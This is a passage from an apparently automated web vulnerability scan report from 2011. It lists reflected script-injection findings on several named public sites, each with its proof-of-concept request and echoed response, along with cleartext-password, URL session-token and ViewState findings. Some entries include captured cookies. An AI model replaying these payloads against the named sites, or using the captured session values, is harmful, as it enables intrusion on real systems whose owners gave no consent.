<html><head><title>Redirect</title></head><body><h1>Redirect</h1><p>You should go to <a href="http://mrnumber.com/favicon.ico8fff9"><script>alert(1)</script>496210cd2cd">http://mrnumber.com/favicon.ic
...[SNIP]...

2.158. http://www.mrnumber.com/favicon.ico [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.mrnumber.com
Path:	/favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 593b7"><script>alert(1)</script>9834e7cd796 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /favicon.ico?593b7"><script>alert(1)</script>9834e7cd796=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.mrnumber.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.0 302 Found
Location: http://mrnumber.com/favicon.ico?593b7"><script>alert(1)</script>9834e7cd796=1
Content-Type: text/html
Content-Length: 272

<html><head><title>Redirect</title></head><body><h1>Redirect</h1><p>You should go to <a href="http://mrnumber.com/favicon.ico?593b7"><script>alert(1)</script>9834e7cd796=1">http://mrnumber.com/favicon
...[SNIP]...

2.159. http://www.mrnumber.com/favicon.ico [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.mrnumber.com
Path:	/favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload e0fda<script>alert(1)</script>79f53615157 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /favicon.ico?e0fda<script>alert(1)</script>79f53615157=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.mrnumber.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.0 302 Found
Location: http://mrnumber.com/favicon.ico?e0fda<script>alert(1)</script>79f53615157=1
Content-Type: text/html
Content-Length: 268

<html><head><title>Redirect</title></head><body><h1>Redirect</h1><p>You should go to <a href="http://mrnumber.com/favicon.ico?e0fda<script>alert(1)</script>79f53615157=1">http://mrnumber.com/favicon.ico?e0fda<script>alert(1)</script>79f53615157=1</a>
...[SNIP]...

2.160. http://www.opinionoutpost.com/favicon.ico [REST URL parameter 1] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.opinionoutpost.com
Path:	/favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bcb49"><script>alert(1)</script>22543bfa152 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /favicon.icobcb49"><script>alert(1)</script>22543bfa152 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.opinionoutpost.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.0 302 This object has moved
Content-type: text/html
Content-Length: 269
Location: https://www.opinionoutpost.com:443/favicon.icobcb49"><script>alert(1)</script>22543bfa152

<html><head><title>302 - This object has moved</title></head>
<body>
<h1>302: This object has moved</h1>
<b><p>Please click <A HREF="https://www.opinionoutpost.com:443/favicon.icobcb49"><script>alert(1)</script>22543bfa152">
...[SNIP]...

2.161. http://www.opinionoutpost.com/favicon.ico [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.opinionoutpost.com
Path:	/favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d57c0"><script>alert(1)</script>ecafb33f606 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /favicon.ico?d57c0"><script>alert(1)</script>ecafb33f606=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.opinionoutpost.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.0 302 This object has moved
Content-type: text/html
Content-Length: 272
Location: https://www.opinionoutpost.com:443/favicon.ico?d57c0"><script>alert(1)</script>ecafb33f606=1

<html><head><title>302 - This object has moved</title></head>
<body>
<h1>302: This object has moved</h1>
<b><p>Please click <A HREF="https://www.opinionoutpost.com:443/favicon.ico?d57c0"><script>alert(1)</script>ecafb33f606=1">
...[SNIP]...

2.162. http://www.rateyourmusic.com/favicon.ico [REST URL parameter 1] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.rateyourmusic.com
Path:	/favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 933fb"><script>alert(1)</script>1ea6fc7b15e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /favicon.ico933fb"><script>alert(1)</script>1ea6fc7b15e HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.rateyourmusic.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 302 Found
Location: http://rateyourmusic.com/favicon.ico933fb"><script>alert(1)</script>1ea6fc7b15e
MIME-Version: 1.0
Date: Fri, 01 Apr 2011 15:57:55 GMT
Server: AOLserver/4.5.0
Content-Type: text/html; charset=utf-8
Content-Length: 357
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML>
<HEAD>
<TITLE>Redirection</TITLE>
</HEAD>
<BODY>
<H2>Redirection</H2>
<A HREF="http://rateyourmusic.com/favicon.ico933fb"><script>alert(1)</script>1ea6fc7b15e">
...[SNIP]...

2.163. http://www.rateyourmusic.com/favicon.ico [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.rateyourmusic.com
Path:	/favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 413d0"><script>alert(1)</script>c14e9c5ba4b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /favicon.ico?413d0"><script>alert(1)</script>c14e9c5ba4b=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.rateyourmusic.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 302 Found
Location: http://rateyourmusic.com/favicon.ico?413d0"><script>alert(1)</script>c14e9c5ba4b=1&413d0"><script>alert(1)</script>c14e9c5ba4b=1
MIME-Version: 1.0
Date: Fri, 01 Apr 2011 15:57:53 GMT
Server: AOLserver/4.5.0
Content-Type: text/html; charset=utf-8
Content-Length: 406
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML>
<HEAD>
<TITLE>Redirection</TITLE>
</HEAD>
<BODY>
<H2>Redirection</H2>
<A HREF="http://rateyourmusic.com/favicon.ico?413d0"><script>alert(1)</script>c14e9c5ba4b=1&413d0">
...[SNIP]...

3. Cleartext submission of password previous next
There are 2 instances of this issue:

http://ecards.myfuncards.com/myfuncards/404
http://www.androidtapp.com/wp-login.php

3.1. http://ecards.myfuncards.com/myfuncards/404 previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ecards.myfuncards.com
Path:	/myfuncards/404

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://ecards.myfuncards.com/registration/loginAjax.jhtml

The form contains the following password field:

loginPassword

Request

GET /myfuncards/404 HTTP/1.1
Host: ecards.myfuncards.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 /myfuncards/404
Date: Fri, 01 Apr 2011 15:58:17 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.8c DAV/2 mod_jk/1.2.28
Content-Language: en-US
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 84745


...[SNIP]...
</div>
                       <form id="loginForm" name="loginForm" method="post" action="/registration/loginAjax.jhtml">
                           <input name="loginEmail" id="loginEmail" class="inp-text" type="text" value="Email Address" />
                           <input name="loginPassword" id="loginPassword" class="inp-text" type="password" value="" />
                           <input class="inp-submit Clickable" type="submit" value="" />
...[SNIP]...

3.2. http://www.androidtapp.com/wp-login.php previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.androidtapp.com
Path:	/wp-login.php

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.androidtapp.com/wp-login.php

The form contains the following password field:

Request

GET /wp-login.php HTTP/1.1
Host: www.androidtapp.com
Proxy-Connection: keep-alive
Referer: http://www.androidtapp.com/favicon.icoef3b2%3Cscript%3Ealert(1)%3C/script%3Ed2de5acaa49
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=b4b02331d89ff875:T=1301681709:S=ALNI_MYpSTRZveHosSTXFDXa1dTNOqCBCQ; PHPSESSID=bd8c5d93b8229accde529b3c0d1c1feb; GDgkjFlavnmGhFmj=kvGgzkvGumABBBxy; SJECT=CKON

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Fri, 01 Apr 2011 18:15:58 GMT
Server: LiteSpeed
Connection: close
X-Powered-By: PHP/5.2.9
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Fri, 01 Apr 2011 18:15:58 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: wordpress_test_cookie=WP+Cookie+check; path=/
Content-Length: 2231
Vary: User-Agent

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head>
   <ti
...[SNIP]...
</h1>

<form name="loginform" id="loginform" action="http://www.androidtapp.com/wp-login.php" method="post">
   <p>
...[SNIP]...
<br />
       <input type="password" name="pwd" id="user_pass" class="input" value="" size="20" tabindex="20" /></label>
...[SNIP]...

4. Session token in URL previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://bh.contextweb.com
Path:	/bh/set.aspx

Issue detail

The URL in the request appears to contain a session token within the query string:

http://bh.contextweb.com/bh/set.aspx?action=add&advid=357&token=EMON1

Request

GET /bh/set.aspx?action=add&advid=357&token=EMON1 HTTP/1.1
Host: bh.contextweb.com
Proxy-Connection: keep-alive
Referer: http://www.beatthetraffic.com/widgets/traveltimes.aspx?regionid=15&customerid=6453&partner=TWC_NewYork&inrix=1&items=3&link=&code=0&ts=4&rc=false
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FC1-WC=^54463_2_2v0tA; __utmz=57563192.1300142889.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _jsuid=9731344706080960861; __utma=57563192.1578638003.1300142889.1300142889.1300142889.1; C2W4=3TQwcI7gaOg8elrf0zppGQ5W8-kjh6AzvbIlXPAjnP9LEy1n0VWmaZA; cr=15|1|-8589001706530866039|1%0a2|1|-8588996610000594670|2; V=GlchrMbA1MSR; cwbh1=357%3B03%2F30%2F2011%3BEHEX1%0A1931%3B04%2F16%2F2011%3BFE479%3B04%2F06%2F2011%3BFE311%3B04%2F02%2F2011%3BFE655%0A996%3B04%2F05%2F2011%3BFACO1%0A2452%3B04%2F21%2F2011%3BTMHS1%0A749%3B04%2F12%2F2011%3BDOTM3%0A2866%3B04%2F04%2F2011%3BSHME2%0A2863%3B04%2F20%2F2011%3BITUT5%0A541%3B04%2F23%2F2011%3BLIFL1%0A398%3B03%2F27%2F2012%3BBK078

Response

HTTP/1.1 200 OK
Server: Sun GlassFish Enterprise Server v2.1
CW-Server: cw-web82
Set-Cookie: V=GlchrMbA1MSR; Domain=.contextweb.com; Expires=Mon, 26-Mar-2012 18:11:06 GMT; Path=/
Set-Cookie: cwbh1=357%3B05%2F01%2F2011%3BEMON1%0A1931%3B04%2F16%2F2011%3BFE479%3B04%2F06%2F2011%3BFE311%3B04%2F02%2F2011%3BFE655%0A996%3B04%2F05%2F2011%3BFACO1%0A2452%3B04%2F21%2F2011%3BTMHS1%0A749%3B04%2F12%2F2011%3BDOTM3%0A2866%3B04%2F04%2F2011%3BSHME2%0A2863%3B04%2F20%2F2011%3BITUT5%0A541%3B04%2F23%2F2011%3BLIFL1%0A398%3B03%2F27%2F2012%3BBK078; Domain=.contextweb.com; Expires=Sat, 05-Mar-2016 18:11:06 GMT; Path=/
Content-Type: image/gif
Date: Fri, 01 Apr 2011 18:11:05 GMT
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Content-Length: 49

GIF89a...................!.......,...........T..;

5. ASP.NET ViewState without MAC enabled previous next
There are 2 instances of this issue:

http://www.maybenow.com/favicon.ico
http://www.nabiscoworld.com/favicon.ico

5.1. http://www.maybenow.com/favicon.ico previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.maybenow.com
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.maybenow.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-Powered-By: UrlRewriter.NET 2.0.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Fri, 01 Apr 2011 17:02:17 GMT
Content-Length: 13703

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="Head1"><meta http-
...[SNIP]...
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwULLTE5MzA2Nzk4NzQPZBYCAgMPZBYCZhBkZBYOZg8WAh4EVGV4dAWwATxsaT48YSBocmVmPSJodHRwOi8vd3d3Lm1heWJlbm93LmNvbS9Mb2dpbi5hc3B4IiB0aXRsZT0iTG9naW4iPkxvZ2luPC9hPiA8c3Bhbj4gfCA8L3NwYW4+IDxhIGhyZWY9Imh0dHA6Ly93d3cubWF5YmVub3cuY29tL1JlZ2lzdHJhdGlvbi5hc3B4IiB0aXRsZT0iUmVnaXN0ZXIiPlJlZ2lzdGVyPC9hPjwvbGk+ZAIBDxYCHwAFkwQ8dWwgY2xhc3M9J3dyYXBwZXInPjxsaT48YSBocmVmPSdodHRwOi8vd3d3Lm1heWJlbm93LmNvbS9RQScgVGl0bGU9J1F1ZXN0aW9ucyAmYW1wOyBBbnN3ZXJzIEhvbWUnPlF1ZXN0aW9ucyAmYW1wOyBBbnN3ZXJzPC9hPjwvbGk+PGxpPjxhIGhyZWY9J2h0dHA6Ly9saXZlc3VwcG9ydC5tYXliZW5vdy5jb20nIFRpdGxlPSdDb21wYW5pZXMgJmFtcDsgUHJvZHVjdHMgU3VwcG9ydCBIb21lJz5Db21wYW5pZXMgJmFtcDsgUHJvZHVjdHMgU3VwcG9ydDwvYT48L2xpPjxsaT48YSBocmVmPSdodHRwOi8vdHJlbmRzLm1heWJlbm93LmNvbScgVGl0bGU9J1RyZW5kcyc+VHJlbmRzPC9hPjwvbGk+PGxpPjxhIGhyZWY9J2h0dHA6Ly93d3cubWF5YmVub3cuY29tL0NhdGVnb3JpZXMnIFRpdGxlPSdDYXRlZ29yaWVzJz5DYXRlZ29yaWVzPC9hPjwvbGk+PGxpPjxhIGhyZWY9J2h0dHA6Ly93d3cubWF5YmVub3cuY29tL0xlYWRlcmJvYXJkL1RvcC1Vc2Vycy1vZi1Ub2RheScgVGl0bGU9J1RvcCBVc2Vycyc+VG9wIFVzZXJzPC9hPjwvbGk+PC91bD5kAgMPFgIfAAWgAVBsZWFzZSBkb3VibGUgY2hlY2sgdGhlIFVSTCBhbmQgdHJ5IGFnYWluLjxiciAvPjxiciAvPiBZb3UgbWF5IGFsc28gZ28gdG8gPGEgaHJlZj0iaHR0cDovL3d3dy5tYXliZW5vdy5jb20iPk1heWJlTm93IEhvbWUgUGFnZTwvYT4gdG8gYnJvd3NlIG90aGVyIHN0dWZmLiBUaGFua3NkAgQPFgIfAAWpEjx1bCBjbGFzcz0nd3JhcHBlcic+PGxpPjxoNCBjbGFzcz0nZnRoNCc+UXVlc3Rpb25zICZhbXA7IEFuc3dlcnM8L2g0Pjx1bD48bGk+PGEgaHJlZj0naHR0cDovL3d3dy5tYXliZW5vdy5jb20vQ2F0ZWdvcmllcycgVGl0bGU9J0NhdGVnb3JpZXMnPkNhdGVnb3JpZXM8L2E+PC9saT48bGk+PGEgaHJlZj0naHR0cDovL3d3dy5tYXliZW5vdy5jb20vUG9wdWxhci1RdWVzdGlvbnMtcDEnIFRpdGxlPSdQb3B1bGFyIFF1ZXN0aW9ucyc+UG9wdWxhciBRdWVzdGlvbnM8L2E+PC9saT48bGk+PGEgaHJlZj0naHR0cDovL3d3dy5tYXliZW5vdy5jb20vUmVjZW50LVF1ZXN0aW9ucy1wMScgVGl0bGU9J1JlY2VudCBRdWVzdGlvbnMnPlJlY2VudCBRdWVzdGlvbnM8L2E+PC9saT48bGk+PGEgaHJlZj0naHR0cDovL3d3dy5tYXliZW5vdy5jb20vVW5hbnN3ZXJlZC1RdWVzdGlvbnMtcDEnIFRpdGxlPSdVbmFuc3dlcmVkIFF1ZXN0aW9ucyc+VW5hbnN3ZXJlZCBRdWVzdGlvbnM8L2E+PC9saT48bGk+PGEgaHJlZj0naHR0cDovL3d3dy5tYXliZW5vdy5jb20vQW5zd2VyZWQtUXVlc3Rpb25zLXAxJyBUaXRsZT0nQW5zd2VyZWQgUXVlc3Rpb25zJz5BbnN3ZXJlZCBRdWVzdGlvbnM8L2E+PC9saT48L3VsPjwvbGk+PGxpPjxoNCBjbGFzcz0nZnRoNCc+VHJlbmRzPC9oND48dWw+PGxpPjxhIGhyZWY9J2h0dHA6Ly90cmVuZHMubWF5YmVub3cuY29tL1JlY2VudC1wMScgVGl0bGU9J05vdyBUcmVuZGluZyc+Tm93IFRyZW5kaW5nPC9hPjwvbGk+PGxpPjxhIGhyZWY9J2h0dHA6Ly90cmVuZHMubWF5YmVub3cuY29tL1BvcHVsYXItcDEnIFRpdGxlPSdQb3B1bGFyIFRyZW5kcyc+UG9wdWxhciBUcmVuZHM8L2E+PC9saT48bGk+PGEgaHJlZj0naHR0cDovL3RyZW5kcy5tYXliZW5vdy5jb20vUmVjZW50bHktRWRpdGVkLXAxJyBUaXRsZT0nUmVjZW50bHkgRWRpdGVkIFRyZW5kcyc+UmVjZW50bHkgRWRpdGVkIFRyZW5kczwvYT48L2xpPjxsaT48YSBocmVmPSdodHRwOi8vY2VsZWJyaXR5Lm1heWJlbm93LmNvbS90YWxhdGh1c3NhaW4nIFRpdGxlPSdTeWVkIFRhbGF0IEh1c3NhaW4nPlN5ZWQgVGFsYXQgSHVzc2FpbjwvYT48L2xpPjwvdWw+PC9saT48bGk+PGg0IGNsYXNzPSdmdGg0Jz5Db21wYW5pZXMgJmFtcDsgUHJvZHVjdHM8L2g0Pjx1bD48bGk+PGEgaHJlZj0naHR0cDovL2xpdmVzdXBwb3J0Lm1heWJlbm93LmNvbScgVGl0bGU9J0NvbXBhbmllcyAmYW1wOyBQcm9kdWN0cyBIb21lJz5Db21wYW5pZXMgJmFtcDsgUHJvZHVjdHMgSG9tZTwvYT48L2xpPjxsaT48YSBocmVmPSdodHRwOi8vbGl2ZXN1cHBvcnQubWF5YmVub3cuY29tL0NvbXBhbmllcycgVGl0bGU9J0NvbXBhbmllcyc+Q29tcGFuaWVzPC9hPjwvbGk+PGxpPjxhIGhyZWY9J2h0dHA6Ly9saXZlc3VwcG9ydC5tYXliZW5vdy5jb20vQ2F0ZWdvcmllcycgVGl0bGU9J1Byb2R1Y3RzIENhdGVnb3JpZXMnPlByb2R1Y3RzIENhdGVnb3JpZXM8L2E+PC9saT48bGk+PGEgaHJlZj0naHR0cDovL2xpdmVzdXBwb3J0Lm1heWJlbm93LmNvbS9Qcm9ibGVtcy1wMScgVGl0bGU9J1JlY2VudCBQcm9ibGVtcyc+UmVjZW50IFByb2JsZW1zPC9hPjwvbGk+PGxpPjxhIGhyZWY9J2h0dHA6Ly9saXZlc3VwcG9ydC5tYXliZW5vdy5jb20vU29sdXRpb25zLXAxJyBUaXRsZT0nUmVjZW50IFNvbHV0aW9ucyc+UmVjZW50IFNvbHV0aW9uczwvYT48L2xpPjxsaT48YSBocmVmPSdodHRwOi8vd3d3Lm1heWJlbm93LmNvbS9Vc2Vycy9TdXBwb3J0L0NyZWF0ZUNvbXBhbnkuYXNweCcgVGl0bGU9J1JlZ2lzdGVyIFlvdXIgQ29tcGFueSc+UmVnaXN0ZXIgWW91ciBDb21wYW55PC9hPjwvbGk+PC91bD48L2xpPjxsaT48aDQgY2xhc3M9J2Z0aDQnPlVzZXJzPC9oND48dWw+PGxpPjxhIGhyZWY9J2h0dHA6Ly93d3cubWF5YmVub3cuY29tL0xlYWRlcmJvYXJkL1RvcC1Vc2Vycy1PZi1Ub2RheScgVGl0bGU9J1RvcCBVc2VycyBvZiBUb2RheSc+VG9wIFVzZXJzIG9mIFRvZGF5PC9hPjwvbGk+PGxpPjxhIGhyZWY9J2h0dHA6Ly93d3cubWF5YmVub3cuY29tL0xlYWRlcmJvYXJkL1RvcC1Vc2Vycy1PZi1XZWVrJyBUaXRsZT0nVG9wIFVzZXJzIG9mIFdlZWsnPlRvcCBVc2VycyBvZiBXZWVrPC9hPjwvbGk+PGxpPjxhIGhyZWY9J2h0dHA6Ly93d3cubWF5YmVub3cuY29tL0xlYWRlcmJvYXJkL1RvcC1Vc2VycycgVGl0bGU9J1RvcCBVc2VycyBvZiBBbGwgVGltZSc+VG9wIFVzZXJzIG9mIEFsbCBUaW1lPC9hPjwvbGk+PGxpPjxhIGhyZWY9J2h0dHA6Ly93d3cubWF5YmVub3cuY29tL1VzZXJzL1JlY2VudC1Vc2Vycy1wMScgVGl0bGU9J1JlY2VudCBVc2Vycyc+UmVjZW50IFVzZXJzPC9hPjwvbGk+PC91bD48L2xpPjwvdWw+ZAIFDxYCHwAFswJGT0xMT1cgVVM6IDxhIGNsYXNzPSd0d2l0aWNvbicgcmVsID0gJ25vZm9sbG93JyBocmVmPSdodHRwOi8vdHdpdHRlci5jb20vTWF5YmVOb3cnPlR3aXR0ZXI8L2E+IDxhIGNsYXNzPSdmYmljb24nIHJlbCA9ICdub2ZvbGxvdycgaHJlZj0naHR0cDovL3d3dy5mYWNlYm9vay5jb20vYXBwcy9hcHBsaWNhdGlvbi5waHA/aWQ9MTE3MDA3MTk4MTE0Jz5GYWNlYm9vazwvYT48YSBjbGFzcz0ncnNzaWNvbicgcmVsID0gJ25vZm9sbG93JyBocmVmPSdodHRwOi8vd3d3Lm1heWJlbm93LmNvbS9GZWVkcy9SZWNlbnQtUXVlc3Rpb25zJz5SU1M8L2E+ZAIGDxYCHwAFoQc8YSBocmVmPSdodHRwOi8vd3d3Lm1heWJlbm93LmNvbS9BYm91dFVzLmFzcHgnIFRpdGxlPSdBYm91dCBVcydyZWwgPSAibm9mb2xsb3ciPkFib3V0IFVzPC9hPiAmbmJzcDt8ICZuYnNwPGEgaHJlZj0naHR0cDovL3d3dy5tYXliZW5vdy5jb20vQ29udGFjdFVzLmFzcHgnIFRpdGxlPSdDb250YWN0IFVzJ3JlbCA9ICJub2ZvbGxvdyI+Q29udGFjdCBVczwvYT4gJm5ic3A7fCAmbmJzcDxhIGhyZWY9J2h0dHA6Ly93d3cubWF5YmVub3cuY29tL1JlcG9ydEFCdWcuYXNweCcgVGl0bGU9J1JlcG9ydCBhIEJ1ZydyZWwgPSAibm9mb2xsb3ciPlJlcG9ydCBhIEJ1ZzwvYT4gJm5ic3A7fCAmbmJzcDxhIGhyZWY9J2h0dHA6Ly9tYXliZW5vdy51c2Vydm9pY2UuY29tLycgVGl0bGU9J1NoYXJlIElkZWFzJ3JlbCA9ICJub2ZvbGxvdyI+U2hhcmUgSWRlYXM8L2E+ICZuYnNwO3wgJm5ic3A8YSBocmVmPSdodHRwOi8vd3d3Lm1heWJlbm93LmNvbS9BZHZlcnRpc2VtZW50LmFzcHgnIFRpdGxlPSdBZHZlcnRpc2Ugd2l0aCBVcydyZWwgPSAibm9mb2xsb3ciPkFkdmVydGlzZSB3aXRoIFVzPC9hPiAmbmJzcDt8ICZuYnNwPGEgaHJlZj0naHR0cDovL21heWJlbm93Lk91clRvb2xiYXIuY29tL2V4ZScgVGl0bGU9J1RyeSBvdXIgdG9vbGJhcidyZWwgPSAibm9mb2xsb3ciPlRyeSBvdXIgdG9vbGJhcjwvYT4gJm5ic3A7fCAmbmJzcDxhIGhyZWY9J2h0dHA6Ly93d3cubWF5YmVub3cuY29tL1ByaXZhY3lQb2xpY3kuYXNweCcgVGl0bGU9J1ByaXZhY3kgUG9saWN5J3JlbCA9ICJub2ZvbGxvdyI+UHJpdmFjeSBQb2xpY3k8L2E+ICZuYnNwO3wgJm5ic3A8YSBocmVmPSdodHRwOi8vd3d3Lm1heWJlbm93LmNvbS9UZXJtc09mVXNlLmFzcHgnIFRpdGxlPSdUZXJtcyBvZiBVc2UncmVsID0gIm5vZm9sbG93Ij5UZXJtcyBvZiBVc2U8L2E+ICZuYnNwOyAmbmJzcGQCBw8WAh8ABWhDb3B5cmlnaHQgwqkgMjAxMCA8YSBocmVmPWh0dHA6Ly93d3cubWF5YmVub3cuY29tIHRpdGxlPU1heWJlTm93Pk1heWJlTm93PC9hPiwgSW5jLiBBbGwgcmlnaHRzIHJlc2VydmVkLmRk" />
...[SNIP]...

5.2. http://www.nabiscoworld.com/favicon.ico previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.nabiscoworld.com
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.nabiscoworld.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Content-Type: text/html; charset=utf-8
